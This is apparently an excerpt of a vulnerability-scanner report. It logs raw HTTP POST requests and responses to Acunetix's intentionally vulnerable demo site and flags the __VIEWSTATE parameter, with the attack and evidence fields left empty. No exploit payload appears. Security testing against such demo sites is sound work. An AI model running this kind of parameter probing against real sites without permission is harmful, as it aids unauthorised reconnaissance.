Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8537&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAaKhpVtsIZGRk3EJhOvy0xiUQyMuh4s3GEGHsF9o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKj1pqZAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1C779dvUKtYDojJLvGTpE1%2F2Ryx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:54 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAaKhpVtsIZGRk3EJhOvy0xiUQyMuh4s3GEGHsF9o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKj1pqZAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1C779dvUKtYDojJLvGTpE1/2Ryx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:White" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8525&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAc6v7TNsIZGRkD1MoNHGEYWflCkB1fLyhHihk%2Bpw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpwMnuCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxviKIbh1RhS3pC%2BkSTsw5yibV7%2B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:56 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAc6v7TNsIZGRkD1MoNHGEYWflCkB1fLyhHihk+pw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpwMnuCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxviKIbh1RhS3pC+kSTsw5yibV7+" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:White" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
